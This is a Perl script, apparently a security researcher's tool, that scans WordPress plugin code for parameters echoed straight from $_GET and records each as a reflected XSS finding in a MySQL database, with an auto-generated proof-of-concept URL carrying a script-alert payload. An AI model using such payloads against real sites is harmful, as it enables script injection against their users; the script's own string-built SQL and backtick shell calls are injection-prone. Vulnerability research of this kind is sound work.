#!/usr/bin/perl -w
use DBI;

my $dsn          = 'DBI:mysql:wpvulndb:localhost';
my $db_user_name = '';
my $db_password  = '';
my $dbh          = DBI->connect( $dsn, $db_user_name, $db_password );

my $year  = (localtime)[5] + 1900;
my $month = (localtime)[4] + 1;
my $day   = (localtime)[3];

my $date = $year . "-" . $month . "-" . $day;

my @FILE = `cat $ARGV[0]`;

my @index = 0;
my $x     = 0;
my $y     = 0;
foreach my $line (@FILE) {
    my $data = `grep --text -n "echo \\\$_GET" ./wp/$line`;
    my @pkg = split /\//, $line;
    chomp($line);
    chomp( $pkg[1] );
    my $dl = `./dl_stat.sh $pkg[1]`;
    chomp($dl);
    my $ver = `./dl_ver.sh $pkg[1]`;
    chomp($ver);
    print "Adding plugin $pkg[1] v$ver in vulnerability database.\n";
    my @exploit   = split /GET\[\'/,   $data;
    my @exploits  = split /GET\[\s\'/, $data;
    my @exploitq  = split /GET\[\"/,   $data;
    my @exploitqs = split /GET\[\s\"/, $data;
if ( $exploit[1] )   { 
     @exploit2 = split /\'/, $exploit[1];
}
    if ( $exploits[1] )  { 
     @exploit2 = split /\s\'/, $exploits[1];
}
    if ( $exploitq[1] )  { 
     @exploit2 = split /\"/, $exploitq[1];
}
    if ( $exploitqs[1] ) { 
     @exploit2 = split /\s\"/, $exploitqs[1];
}
    $exploit = "This is an untested autogenerated exploit:\n";
    $exploit = $exploit . "http://wpsite/wp-content/plugins/$line?$exploit2[0]=\"><script>alert(1);</script><\"";
    my $vuln = "There is a reflected XSS vulnerability in the following php code $line:\n";
    $vuln = $vuln . $data;
   my $title = "Reflected XSS in wordpress plugin $pkg[1] v$ver";
    $vuln = $vuln
      . "The variable $exploit2[0] appears to send unsanitized data back to the users browser.\n";
    $vuln    = $dbh->quote($vuln);
    $exploit = $dbh->quote($exploit);

#create table vulnerabilities (vdbid MEDIUMINT NOT NULL AUTO_INCREMENT key,title char(255),download char(255),vulnerability blob,downloads mediumint,author char(255),plugin char(255),cveid char(255),add_date date,credit char(255));
    print
"\n#############################################################\n$exploit\n#######################################################\n";

       $dbh->do("insert into vulnerabilities (title,download,vulnerability,downloads,author,plugin,cveid,add_date,credit,exploit,file) values (\"$title\",\"https://wordpress.org/plugins/$pkg[1]\",\"$vuln\",\"$dl\",\"unknown\",\"$pkg[1]\",\"TBD\",\"$date\",\"Larry W. Cashdollar\",\"$exploit\",\"$line\")");
#   print "(\"$title\",\"https://wordpress.org/plugins/$pkg[1]\",\"$vuln\",\"$dl\",\"unknown\",\"$pkg[1]\",\"TBD\",\"$date\",\"Larry W. Cashdollar\")";
}

